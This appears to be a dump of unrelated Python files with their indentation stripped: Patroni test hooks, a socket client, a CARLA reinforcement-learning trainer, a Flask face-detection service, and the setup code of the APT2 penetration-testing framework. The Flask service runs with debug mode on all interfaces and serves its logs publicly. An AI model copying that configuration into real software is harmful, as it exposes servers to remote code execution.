self._log("starting fifo {0}".format(self.fifo_path))
fifo_dir = os.path.dirname(self.fifo_path)
if os.path.exists(self.fifo_path):
os.unlink(self.fifo_path)
elif not os.path.exists(fifo_dir):
os.mkdir(fifo_dir)
os.mkfifo(self.fifo_path)
self.last_ping = time.time()
self._thread = threading.Thread(target=self.run)
self._thread.start()
def run(self):
try:
while not self._stop_requested:
self._log("opening")
self.fifo_file = os.open(self.fifo_path, os.O_RDONLY)
try:
self._log("Fifo {0} connected".format(self.fifo_path))
self.was_closed = False
while not self._stop_requested:
c = os.read(self.fifo_file, 1)
if c == b'X':
self._log("Stop requested")
return
elif c == b'':
self._log("Pipe closed")
break
elif c == b'C':
command = b''
c = os.read(self.fifo_file, 1)
while c != b'\n' and c != b'':
command += c
c = os.read(self.fifo_file, 1)
command = command.decode('utf8')
if command.startswith('timeout='):
self.timeout = int(command.split('=')[1])
self._log("timeout={0}".format(self.timeout))
elif c in [b'V', b'1']:
cur_time = time.time()
if cur_time - self.last_ping > self.timeout:
self._log("Triggered")
self._was_triggered = True
if c == b'V':
self._log("magic close")
self.was_closed = True
elif c == b'1':
self.was_pinged = True
self._log("ping after {0} seconds".format(cur_time - (self.last_ping or cur_time)))
self.last_ping = cur_time
else:
self._log('Unknown command {0} received from fifo'.format(c))
finally:
self.was_closed = True
self._log("closing")
os.close(self.fifo_file)
except Exception as e:
self._log("Error {0}".format(e))
finally:
self._log("stopping")
self._log_file.flush()
if os.path.exists(self.fifo_path):
os.unlink(self.fifo_path)
def stop(self):
self._log("Monitor stop")
self._stop_requested = True
try:
if os.path.exists(self.fifo_path):
fd = os.open(self.fifo_path, os.O_WRONLY)
os.write(fd, b'X')
os.close(fd)
except Exception as e:
self._log("err while closing: {0}".format(str(e)))
if self._thread:
self._thread.join()
self._thread = None
def reset(self):
self._log("reset")
self.was_pinged = self.was_closed = self._was_triggered = False
@property
def was_triggered(self):
delta = time.time() - self.last_ping
triggered = self._was_triggered or not self.was_closed and delta > self.timeout
self._log("triggered={0}, {1}s left".format(triggered, self.timeout - delta))
return triggered
# actions to execute on start/stop of the tests and before running invidual features
def before_all(context):
os.environ.update({'PATRONI_RESTAPI_USERNAME': 'username', 'PATRONI_RESTAPI_PASSWORD': 'password'})
context.ci = 'TRAVIS_BUILD_NUMBER' in os.environ or 'BUILD_NUMBER' in os.environ
context.timeout_multiplier = 2 if context.ci else 1
context.pctl = PatroniPoolController(context)
context.dcs_ctl = context.pctl.known_dcs[context.pctl.dcs](context)
context.dcs_ctl.start()
try:
context.dcs_ctl.cleanup_service_tree()
except AssertionError: # after_all handlers won't be executed in before_all
context.dcs_ctl.stop()
raise
def after_all(context):
context.dcs_ctl.stop()
subprocess.call([sys.executable, '-m', 'coverage', 'combine'])
subprocess.call([sys.executable, '-m', 'coverage', 'report'])
def before_feature(context, feature):
""" create per-feature output directory to collect Patroni and PostgreSQL logs """
context.pctl.create_and_set_output_directory(feature.name)
def after_feature(context, feature):
""" stop all Patronis, remove their data directory and cleanup the keys in etcd """
context.pctl.stop_all()
shutil.rmtree(os.path.join(context.pctl.patroni_path, 'data'))
context.dcs_ctl.cleanup_service_tree()
if feature.status == 'failed':
shutil.copytree(context.pctl.output_dir, context.pctl.output_dir + '_failed')
|
client.py | import asyncore
import socket
import json
import threading
server_address = ("127.0.0.1", 5920)
class Client(asyncore.dispatcher):
def __init__(self):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.connect(server_address)
def handle_read(self):
data = self.recv(8192)
print(data)
client = Client()
client_thread = threading.Thread(target=asyncore.loop)
client_thread.setDaemon = False
client_thread.start()
filename = 'pdf_file.pdf'
with open(filename, 'r+b') as fp:
# data = {'filename': filename, 'file_data': fp.read()}
client.send(fp.read())
|
refined_dqn.py | #!/usr/bin/env python3
import glob
import os
import sys
import random
import time
import sys
import numpy as np
import cv2
import math
from collections import deque
import tensorflow as tf
# from keras.applications.xception import Xception
from keras.layers import Dense, GlobalAveragePooling2D, Flatten
from tensorflow.keras.optimizers import Adam
from keras.models import Model
from keras.callbacks import TensorBoard
import tensorflow.keras.backend as backend
from threading import Thread
from tqdm import tqdm
import matplotlib.pyplot as plt
"Starting script for any carla programming"
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
IM_WIDTH = 640
IM_HEIGHT = 480
SECONDS_PER_EPISODE = 20
REPLAY_MEMORY_SIZE = 5_000
MIN_REPLAY_MEMORY_SIZE = 1_000
MINIBATCH_SIZE = 16
PREDICTION_BATCH_SIZE = 1
TRAINING_BATCH_SIZE = MINIBATCH_SIZE // 4
UPDATE_TARGET_EVERY = 5 #used to be 10
MODEL_NAME = "Xception"
MEMORY_FRACTION = 0.8
MIN_REWARD = -200
EPISODES = 1000
DISCOUNT = 0.99
epsilon = 1
EPSILON_DECAY = 0.995 ## 0.9975 99975
MIN_EPSILON = 0.001
AGGREGATE_STATS_EVERY = 5 ## checking per 5 episodes
SHOW_PREVIEW = True ## for debugging purpose
class CarEnv:
SHOW_CAM = SHOW_PREVIEW
STEER_AMT = 1.0 ## full turn for every single time
im_width = IM_WIDTH
im_height = IM_HEIGHT
front_camera = None
def __init__(self):
self.client = carla.Client('127.0.0.1', 2000)
self.client.set_timeout(2.0)
# self.actor = carla.Actor
self.world = self.client.load_world('Town04')
self.map = self.world.get_map() ## added for map creating
self.blueprint_library = self.world.get_blueprint_library()
# weather = carla.WeatherParameters(
# cloudyness=10.0,
# precipitation=10.0,
# sun_altitude_angle=90.0)
# self.world.set_weather(weather)
self.model_3 = self.blueprint_library.filter("model3")[0] ## grab tesla model3 from library
def reset(self):
self.collision_hist = []
self.actor_list = []
self.waypoints = self.client.get_world().get_map().generate_waypoints(distance=3.0)
self.filtered_waypoints = [] ## chaned
i = 0
for self.waypoint in self.waypoints:
if(self.waypoint.road_id == 10):
self.filtered_waypoints.append(self.waypoint)
for i in range(len(self.filtered_waypoints)):
self.world.debug.draw_string(self.filtered_waypoints[i].transform.location, 'O', draw_shadow=False,
color=carla.Color(r=0, g=255, b=0), life_time=40,
persistent_lines=True)
i = i+1
self.spawn_point = self.filtered_waypoints[1].transform
self.spawn_point.location.z += 2
self.vehicle = self.world.spawn_actor(self.model_3, self.spawn_point) ## changed for adding waypoints
# self.spawn_points = self.map.get_spawn_points()
# self.vehicle = self.world.spawn_actor(self.model_3, self.spawn_points) ## changed for adding waypoints
# self.waypoint = self.map.get_waypoint(self.vehicle.get_location())
# self.vehicle.set_simulate_physics(False)
# self.world.debug.draw_string(self.waypoint.transform.location, 'O', draw_shadow=False,
# color=carla.Color(r=0, g=255, b=0), life_time=40,
# persistent_lines=True)
# while True:
# # Find next waypoint 2 meters ahead.
# self.waypoint = random.choice(self.waypoint.next(20.0))
# # Teleport the vehicle.
# self.vehicle.set_transform(self.waypoint.transform)
# self.transform = random.choice(self.world.get_map().get_spawn_points())
# self.vehicle = self.world.spawn_actor(self.model_3, self.transform)
self.actor_list.append(self.vehicle)
self.rgb_cam = self.blueprint_library.find('sensor.camera.rgb')
self.rgb_cam.set_attribute("image_size_x", f"{self.im_width}")
self.rgb_cam.set_attribute("image_size_y", f"{self.im_height}")
self.rgb_cam.set_attribute("fov", f"110") ## fov, field of view
transform = carla.Transform(carla.Location(x=2.5, z=0.7))
self.sensor = self.world.spawn_actor(self.rgb_cam, transform, attach_to=self.vehicle)
self.actor_list.append(self.sensor)
self.sensor.listen(lambda data: self.process_img(data))
self.vehicle.apply_control(carla.VehicleControl(throttle=0.0, brake=0.0)) # initially passing some commands seems to help with time. Not sure why.
time.sleep(4) # sleep to get things started and to not detect a collision when the car spawns/falls from sky.
colsensor = self.world.get_blueprint_library().find('sensor.other.collision')
self.colsensor = self.world.spawn_actor(colsensor, transform, attach_to=self.vehicle)
self.actor_list.append(self.colsensor)
self.colsensor.listen(lambda event: self.collision_data(event))
while self.front_camera is None: ## return the observation
time.sleep(0.01)
self.episode_start = time.time()
self.vehicle.apply_control(carla.VehicleControl(brake=0.0, throttle=0.0))
return self.front_camera
def collision_data(self, event):
self.collision_hist.append(event)
def process_img(self, image):
i = np.array(image.raw_data)
#np.save("iout.npy", i)
i2 = i.reshape((self.im_height, self.im_width, 4))
i3 = i2[:, :, :3]
if self.SHOW_CAM:
cv2.imshow("",i3)
cv2.waitKey(1)
self.front_camera = i3 ## remember to scale this down between 0 and 1 for CNN input purpose
def step(self, action):
'''
For now let's just pass steer left, straight, right
0, 1, 2
'''
if action == 0:
self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer= 0.0 ))
if action == 1:
self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=1.0*self.STEER_AMT))
if action == 2:
self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=-1.0*self.STEER_AMT))
v = self.vehicle.get_velocity()
kmh = int(3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2))
# if len(self.collision_hist) != 0:
# done = True
# reward = -200
# elif kmh < 50:
# done = False
# reward = -1
# elif carla.Location.distance(self, self.waypoint) == 0:
# done = False
# reward = 150
# else:
# done = False
# reward = 10
# if self.episode_start + SECONDS_PER_EPISODE < time.time(): ## when to stop
# done = True
# return self.front_camera, reward, done, None
i = 2
for i in range(2, len(self.filtered_waypoints)):
if len(self.collision_hist) != 0:
done = True
reward = -300
elif kmh < 30:
done = False
reward = -5
elif carla.Location.distance(carla.Actor.get_location(self.actor_list[0]), self.filtered_waypoints[i].transform.location) == 0:
done = False
reward = 25
else:
done = False
reward = 30
i = i + 1
if self.episode_start + SECONDS_PER_EPISODE < time.time(): ## when to stop
done = True
return self.front_camera, reward, done, None
class DQNAgent:
def __init__(self):
## replay_memory is used to remember the sized previous actions, and then fit our model of this amout of memory by doing random sampling
self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE) ## batch step
self.tensorboard = ModifiedTensorBoard(log_dir=f"logs/{MODEL_NAME}-{int(time.time())}")
self.target_update_counter = 0 # will track when it's time to update the target model
self.model = self.create_model()
## target model (this is what we .predict against every step)
self.target_model = self.create_model()
self.target_model.set_weights(self.model.get_weights())
self.terminate = False # Should we quit?
self.last_logged_episode = 0
self.training_initialized = False # waiting for TF to get rolling
def create_model(self):
## input: RGB data, should be normalized when coming into CNN
# base_model = tf.keras.applications.Xception(weights=None, include_top=False, input_shape=(IM_HEIGHT, IM_WIDTH,3))
# x = base_model.output
# x = GlobalAveragePooling2D()(x)
# x = Flatten()(x)
# predictions = Dense(3, activation="linear")(x) ## output layer include three nuros, representing three actions
# model = Model(inputs=base_model.input, outputs=predictions)
# model.compile(loss="mse", optimizer="Adam", metrics=["accuracy"]) ## changed
# return model
base_model = tf.keras.applications.ResNet50(weights='imagenet', include_top=False, input_shape=(480, 640, 3))
base_model.trainable = False
# Additional Linear Layers
inputs = tf.keras.Input(shape=(480, 640, 3))
x = base_model(inputs, training=False)
x = tf.keras.layers.GlobalAveragePooling2D()(x)
x = tf.keras.layers.Flatten()(x)
x = tf.keras.layers.Dense(units=40, activation='relu')(x)
output = tf.keras.layers.Dense(units=3, activation='linear')(x)
# Compile the Model
model = tf.keras.Model(inputs, output)
model.compile(loss='mse', optimizer=tf.keras.optimizers.Adam(learning_rate=0.001))
print(model.summary)
return model
## function handler
# Adds step's data to a memory replay array
# (observation space, action, reward, new observation space, done)= (current_state, action, reward, new_state, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
def train(self):
## starting training only if certain number of samples is already saved
if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
return
## if we do have the proper amount of data to train, we need to randomly select the data we want to train off from our memory
minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
## get current states from minibatch and then get Q values from NN model
## transition is being defined by this: transition = (current_state, action, reward, new_state, done)
current_states = np.array([transition[0] for transition in minibatch])/255
## This is the crazyly changed model:
current_qs_list = self.model.predict(current_states, PREDICTION_BATCH_SIZE) ## changed
## This is normal model
new_current_states = np.array([transition[3] for transition in minibatch])/255
future_qs_list = self.target_model.predict(new_current_states, PREDICTION_BATCH_SIZE)
## image data(normalized RGB data): input
X = []
## action we take(Q values): output
y = []
## calculate Q values for the next step based on Qnew equation
## index = step
for index, (current_state, action, reward, new_state, done) in enumerate(minibatch):
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q
else:
new_q = reward
current_qs = current_qs_list[index]
current_qs[action] = new_q ## Q for the action that we took is now equal to the new Q value
X.append(current_state) ## image we have
y.append(current_qs) ## Q value we have
## only trying to log per episode, not actual training step, so we're going to use the below to keep track
log_this_step = False
if self.tensorboard.step > self.last_logged_episode:
log_this_step = True
self.last_log_episode = self.tensorboard.step
## fit our model
## setting the tensorboard callback, only if log_this_step is true. If it's false, then we'll still fit, we just wont log to TensorBoard.
self.model.fit(np.array(X)/255, np.array(y), batch_size=TRAINING_BATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if log_this_step else None)
## updating to determine if we want to update target_model
if log_this_step:
self.target_update_counter += 1
# If counter reaches set value, update target network with weights of main network
if self.target_update_counter > UPDATE_TARGET_EVERY:
self.target_model.set_weights(self.model.get_weights())
self.target_update_counter = 0
def get_qs(self, state):
q_out = self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
return q_out
## first to train to some nonsense. just need to get a quicl fitment because the first training and predication is slow
def train_in_loop(self):
X = np.random.uniform(size=(1, IM_HEIGHT, IM_WIDTH, 3)).astype(np.float32)
y = np.random.uniform(size=(1, 3)).astype(np.float32)
self.model.fit(X,y, verbose=False, batch_size=1)
self.training_initialized = True
while True:
if self.terminate:
return
self.train()
time.sleep(0.01)
class ModifiedTensorBoard(TensorBoard):
# Overriding init to set initial step and writer (we want one log file for all .fit() calls)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.step = 1
# self.writer = tf.summary.FileWriter(self.log_dir)
self.writer = tf.summary.create_file_writer('self.log_dir')
# Overriding this method to stop creating default log writer
def set_model(self, model):
pass
# Overrided, saves logs with our step number
# (otherwise every .fit() will start writing from 0th step)
def on_epoch_end(self, epoch, logs=None):
self.update_stats(**logs)
# Overrided
# We train for one batch only, no need to save anything at epoch end
def on_batch_end(self, batch, logs=None):
pass
# Overrided, so won't close writer
def on_train_end(self, _):
pass
def _write_logs(self, logs, index):
with self.writer.as_default():
for name, value in logs.items():
tf.summary.scalar(name, value, step=index)
self.step += 1
self.writer.flush()
# Custom method for saving own metrics
# Creates writer, writes custom metrics and closes writer
def update_stats(self, **stats):
self._write_logs(stats, self.step)
if __name__ == '__main__':
FPS = 20
# For stats
ep_rewards = [-200]
# For more repetitive results
random.seed(1)
np.random.seed(1)
tf.random.set_seed(1)
# Memory fraction, used mostly when trai8ning multiple agents
# gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
# backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create models folder, this is where the model will go
if not os.path.isdir('models'):
os.makedirs('models')
# Create agent and environment
agent = DQNAgent()
env = CarEnv()
# Start training thread and wait for training to be initialized
trainer_thread = Thread(target=agent.train_in_loop, daemon=True)
trainer_thread.start()
while not agent.training_initialized:
time.sleep(0.01)
##
agent.get_qs(np.ones((env.im_height, env.im_width, 3)))
rewards = []
episode_list = []
# Iterate over episodes
for episode in tqdm(range(1, EPISODES + 1), unit='episodes'):
#try:
env.collision_hist = []
# Update tensorboard step every episode
agent.tensorboard.step = episode
# Restarting episode - reset episode reward and step number
episode_reward = 0
step = 1
# Reset environment and get initial state
current_state = env.reset()
# Reset flag and start iterating until episode ends
done = False
episode_start = time.time()
# Play for given number of seconds only
while True:
# np.random.random() will give us the random number between 0 and 1. If this number is greater than our randomness variable,
# we will get Q values baed on tranning, but otherwise, we will go random actions.
if np.random.random() > epsilon:
# Get action from Q table
action = np.argmax(agent.get_qs(current_state))
else:
# Get random action
action = np.random.randint(0, 3)
# This takes no time, so we add a delay matching 60 FPS (prediction above takes longer)
time.sleep(1/FPS)
new_state, reward, done, _ = env.step(action)
# Transform new continous state to new discrete state and count reward
episode_reward += reward
# Every step we update replay memory
agent.update_replay_memory((current_state, action, reward, new_state, done))
current_state = new_state
step += 1
if done:
break
episode_list.append(episode)
rewards.append(episode_reward)
# End of episode - destroy agents
for actor in env.actor_list:
actor.destroy()
# Append episode reward to a list and log stats (every given number of episodes)
ep_rewards.append(episode_reward)
if not episode % AGGREGATE_STATS_EVERY or episode == 1: ## every show_stats_every, which is 10 right now, show and save teh following
average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:])/len(ep_rewards[-AGGREGATE_STATS_EVERY:])
min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:])
max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:])
agent.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon)
# Save model, but only when min reward is greater or equal a set value
if average_reward >= -100:
agent.model.save('models/rlmodel')
# Decay epsilon
if epsilon > MIN_EPSILON:
epsilon *= EPSILON_DECAY
epsilon = max(MIN_EPSILON, epsilon)
#plt.figure(1)
plt.xlabel('Episodes')
plt.ylabel('Rewards')
plt.title('Figure 2: Average Rewards over Episodes')
plt.plot(episode_list, rewards)
plt.savefig('_out/reward_graph.png')
# Set termination flag for training thread and wait for it to finish
agent.terminate = True
trainer_thread.join()
# agent.model.save('models/rlmodel') |
face_detection_service.py | # MIT License
#
# Copyright (c) 2019 Onur Dundar
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from flask import Flask, request, jsonify, make_response, redirect
import logging
import sys
import optparse
import time
import cv2 as cv
import asyncio
import threading
from detection.face_detection_ov import FaceDetectionConfig, OpenMZooFaceDetection, FaceDetectionModelTypes, MtCNNFaceDetection, MTCNNFaceDetectionConfig
from detection.age_gender_detection_ov import AgeGenderConfig, MTCNNAgeGenderDetection, AgeGenderDetectionTypes, MTCNNAgeGenderConfig, AgeGenderDetection
from utils.image_utils import ImageUtil
app = Flask(__name__)
start = int(round(time.time()))
loop = asyncio.get_event_loop()
thread = threading.Thread()
class AppStatus:
STARTED = "STARTED"
FINISHED = "FINISHED"
NOTSTARTED = "NOTSTARTED"
STOPREQUEST = "STOPREQUESTED"
def prepare_configs():
"""
Set Configurations for Face, Age Gender Models
:return: face config, age_gender config
"""
logging.getLogger(name="inference").log(logging.INFO, "Setting Configurations")
if face_detection_model == FaceDetectionModelTypes.MTCNN:
face_infer_cfg = MTCNNFaceDetectionConfig()
else:
face_infer_cfg = FaceDetectionConfig()
face_infer_cfg.read_dict(json_req)
logging.getLogger(name="inference").log(logging.INFO, "Configuration Set Completed...")
return face_infer_cfg
async def inference():
if inference_status == AppStatus.FINISHED or inference_status == AppStatus.NOTSTARTED:
run_inference()
else:
logging.log(logging.WARN, "Inference Already Running ... ")
loop.stop()
return "OK"
def run_inference():
"""
Runs Face Detection Application with the Requested JSON
:return:
"""
face_cfg = prepare_configs()
if input_type == "video":
logging.log(logging.INFO, "Video File Input Selected")
capture = cv.VideoCapture(input_path)
has_frame, frame = capture.read()
elif input_type == "webcam":
logging.log(logging.INFO, "Webcam Video Selected")
capture = cv.VideoCapture(web_cam_index)
has_frame, frame = capture.read()
elif input_type == "image":
logging.log(logging.INFO, "Single Image Inference Selected")
frame = cv.imread(input_path)
else:
logging.log(logging.ERROR, "Invalid Input Type: {}".format(input_type))
exit(-1)
face_cfg.InputHeight = frame.shape[0]
face_cfg.InputWidth = frame.shape[1]
logging.getLogger(name="inference").log(logging.INFO, "Input Frame H: {} W: {}".format(face_cfg.InputHeight, face_cfg.InputWidth))
if face_detection_model == FaceDetectionModelTypes.MTCNN:
face_infer = MtCNNFaceDetection(face_cfg)
else:
face_infer = OpenMZooFaceDetection(face_cfg)
face_request_order = list()
face_process_order = list()
for i in range(face_infer.Config.RequestCount):
face_request_order.append(i)
frame_order = []
frame_id = 1
global inference_status
inference_status = AppStatus.STARTED
if save_roi_text:
roi_file = open(output_dir + roi_text_filename, 'w')
roi = "{};{};{};{};{}\n".format("frameid","xmin","ymin","xmax","ymax")
roi_file.write(roi)
if save_roi_video:
fourcc = cv.VideoWriter_fourcc('X', '2', '6', '4')
roi_video = cv.VideoWriter(output_dir + roi_video_filename, fourcc, 10, (face_cfg.InputWidth, face_cfg.InputHeight ))
if input_type == "video" or input_type == "webcam":
while has_frame:
if inference_status == AppStatus.STOPREQUEST:
break
logging.log(logging.DEBUG, "Processing Frame {}".format(frame_id))
if len(face_request_order) > 0:
req_id = face_request_order[0]
face_request_order.pop(0)
face_infer.infer(frame, req_id)
face_process_order.append(req_id)
frame_order.append(frame)
if len(face_process_order) > 0:
first = face_process_order[0]
if face_infer.request_ready(request_id=first):
detected_faces = face_infer.get_face_detection_data(first)
if face_cfg.ModelType == FaceDetectionModelTypes.MTCNN:
face_landmarks = face_infer.get_face_landmarks_data(first)
face_process_order.pop(0)
face_request_order.append(first)
show_frame = frame_order[0]
frame_order.pop(0)
if len(detected_faces) > 0:
for idx, face in enumerate(detected_faces):
ImageUtil.draw_rectangle(show_frame, (face[0], face[1], face[2], face[3]))
if face_cfg.ModelType == FaceDetectionModelTypes.MTCNN:
for coordinate in range(0, len(face_landmarks[idx]), 2):
ImageUtil.draw_ellipse(show_frame, [face_landmarks[idx][coordinate],
face_landmarks[idx][coordinate + 1]])
if save_roi_text:
roi = "{};{};{};{};{}\n".format(frame_id, face[0], face[1], face[2], face[3])
roi_file.write(roi)
if save_only_frames and not save_roi_video and len(detected_faces) > 0:
cv.imwrite(output_dir + roi_frame_filename + "_{}.png".format(frame_id), show_frame)
elif save_roi_video:
roi_video.write(show_frame)
# Required Since
face_infer.LastFaceDetections = []
face_infer.LastLandmarkDetections = []
if len(face_request_order) > 0:
has_frame, frame = capture.read()
frame_id += 1
else:
face_infer.infer(frame)
faces = face_infer.get_face_detection_data()
if face_cfg.ModelType == FaceDetectionModelTypes.MTCNN:
landmarks = face_infer.get_face_landmarks_data()
if len(faces) > 0:
print("Detected {} Faces with {} Threshold".format(len(faces), face_infer.Config.FaceDetectionThreshold))
for idx, face in enumerate(faces):
ImageUtil.draw_rectangle(frame, (face[0], face[1], face[2], face[3]))
if face_cfg.ModelType == FaceDetectionModelTypes.MTCNN:
for coordinate in range(0, len(landmarks[idx]), 2):
ImageUtil.draw_ellipse(frame, [landmarks[idx][coordinate], landmarks[idx][coordinate + 1]])
if save_roi_text:
roi = "{};{};{};{};{}\n".format(frame_id, face[0], face[1], face[2], face[3])
roi_file.write(roi)
if save_only_frames:
cv.imwrite(output_dir + roi_frame_filename + "_{}.png".format(frame_id), frame)
face_infer.print_inference_performance_metrics()
inference_status = AppStatus.FINISHED
roi_file.close()
roi_video.release()
inference_status = AppStatus.NOTSTARTED
input_type = "image"
input_path = ''
web_cam_index = 0
face_detection_model = FaceDetectionModelTypes.OPENMODELZOO
logfile_name = "log.txt" # "/app/log.txt"
json_req = None
output_dir = "./"
roi_text_filename = "inference_roi.txt"
roi_video_filename = "inference_roi.mp4"
roi_frame_filename = "inference_frame"
save_roi_video = False
save_only_frames = False
save_roi_text = True
@app.route("/", methods=['GET', 'POST'])
def start():
if request.is_json:
# Parse the JSON into a Python dictionary
req = request.json
try:
if req["log_level"] == "DEBUG":
logging.basicConfig(filename=logfile_name,
level=logging.DEBUG,
filemode='a',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S')
elif req["log_level"] == "INFO":
logging.basicConfig(filename=logfile_name,
level=logging.INFO,
filemode='a',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S')
elif req["log_level"] == "WARN":
logging.basicConfig(filename=logfile_name,
level=logging.WARN,
filemode='a',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S')
else:
logging.basicConfig(filename=logfile_name,
level=logging.ERROR,
filemode='a',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S')
logging.log(logging.WARN, "Log Level Set to: {}".format(req["log_level"]))
global input_path
input_path = req["input_path"]
logging.log(logging.WARN, "Input Path: {}".format(req["input_path"]))
global input_type
input_type = req["input_type"]
logging.log(logging.WARN, "Input Type: {}".format(req["input_type"]))
global web_cam_index
web_cam_index = int(req["web_cam_index"])
logging.log(logging.WARN, "Web Cam {}".format(req["web_cam_index"]))
global face_detection_model
if req['face_detection_model'] == FaceDetectionModelTypes.MTCNN:
face_detection_model = FaceDetectionModelTypes.MTCNN
logging.log(logging.WARN, "Face Detection Model {}".format(req["face_detection_model"]))
global save_roi_video
if req["save_roi_video"] == "True":
save_roi_video = True
global save_only_frames
if req["save_only_frames"] == "True":
save_only_frames = True
global save_roi_text
if req["save_roi"] == "False":
save_roi_text = False
res = make_response(jsonify({"message": "INFERENCE STARTED"}), 200)
global json_req
json_req = req
#threading.Thread(target=run_inference()).start()
# Start Async Thread
logging.log(logging.WARN, "Starting Inference ...")
task = loop.create_task(inference())
if not loop.is_running():
loop.run_forever()
else:
logging.log(logging.WARN, "Thread Loop Running ...")
return res
except KeyError:
logging.log(logging.ERROR, "Key Not Found Error")
exit(-1)
except Exception as e:
logging.log(logging.ERROR, e.__str__())
exit(-1)
# Return a string along with an HTTP status code
else:
# The request body wasn't JSON so return a 400 HTTP status code
return "Request was not JSON", 400
@app.route("/status", methods=["GET"])
def status():
"""
Get App Status
:return:
"""
logging.log(logging.WARN, "STATUS CALLED")
return jsonify(inference_status), 200
@app.route("/stop_inference", methods=["POST"])
def stop_inference():
"""
Get App Status
:return:
"""
global inference_status
inference_status = AppStatus.STOPREQUEST
logging.log(logging.WARN, "STOPPING INFERENCE ... ")
return jsonify(inference_status), 200
@app.route("/logs", methods=["GET"])
def logs():
"""
Show Logs
:return:
"""
with open(logfile_name) as f:
file_content = f.read()
return file_content, 200
@app.route("/results", methods=["GET"])
def results():
"""
Get Latest Results
:return:
"""
roifile = output_dir + roi_text_filename
with open(roifile) as f:
file_content = f.read()
return file_content
@app.route('/play_roi', methods=["GET"])
def play_roi():
return redirect(output_dir + roi_video_filename)
if __name__ == '__main__':
parser = optparse.OptionParser(usage="python3 /app/face_detection_service.py -p ")
parser.add_option('-p', '--port', action='store', dest='port', help='The port to listen on.')
(args, _) = parser.parse_args()
if args.port is None:
print("Missing required argument: -p/--port")
sys.exit(1)
app.run(host='0.0.0.0', port=int(args.port), debug=True, threaded=True) |
framework.py | import argparse
import imp
import os
import re
import sys
# import our libs
from utils import Utils, Display
from keystore import KeyStore as kb
from events import EventHandler
from mynmap import mynmap
from mymsf import myMsf
from threading import RLock, Thread
from keyeventthread import KeyEventThread
class Framework():
def __init__(self):
self.display = Display()
self.modulelock = RLock()
self.inputModules = {}
self.actionModules = {}
self.reportModules = {}
self.progName = "APT2"
self.version = "error"
self.isRunning = True # Conditional to check if user wants to quit
self.inputs = {}
self.config = {}
self.config["outDir"] = os.getcwd() + "/"
self.config["reportDir"] = ""
self.config["logDir"] = ""
self.config["proofsDir"] = ""
self.config["tmpDir"] = ""
self.config["miscDir"] = ""
self.config['lhost'] = Utils.getIP()
self.setupDirs()
# initialize some config options
self.config["config_filename"] = ""
# default all bool values to False
self.config["verbose"] = False
self.config["always_yes"] = False
self.config["list_modules"] = False
self.config["scan_target"] = None
self.config["scan_target_list"] = None
self.config["safe_level"] = 4
self.config["exclude_types"] = ""
# make temp file for the KB save file
self.kbSaveFile = self.config["proofsDir"] + "KB-" + Utils.getRandStr(10) + ".save"
self.threadcount_thread = None
self.keyevent_thread = None
self.allFinished = False
# ==================================================
# SUPPORT METHODS
# ==================================================
# ----------------------------
# Setup Directories
# ----------------------------
def setupDirs(self):
# make directories
if not os.path.isdir(self.config["outDir"] + "reports/"):
os.makedirs(self.config["outDir"] + "reports/")
self.config["reportDir"] = self.config["outDir"] + "reports/"
if not os.path.isdir(self.config["outDir"] + "logs/"):
os.makedirs(self.config["outDir"] + "logs/")
self.config["logDir"] = self.config["outDir"] + "logs/"
self.display.setLogPath(self.config["logDir"])
if not os.path.isdir(self.config["outDir"] + "proofs/"):
os.makedirs(self.config["outDir"] + "proofs/")
self.config["proofsDir"] = self.config["outDir"] + "proofs/"
if not os.path.isdir(self.config["outDir"] + "tmp/"):
os.makedirs(self.config["outDir"] + "tmp/")
self.config["tmpDir"] = self.config["outDir"] + "tmp/"
if not os.path.isdir(self.config["outDir"] + "misc/"):
os.makedirs(self.config["outDir"] + "misc/")
self.config["miscDir"] = self.config["outDir"] + "misc/"
# ----------------------------
# Check the current Version
# ----------------------------
def versionCheck(self):
try:
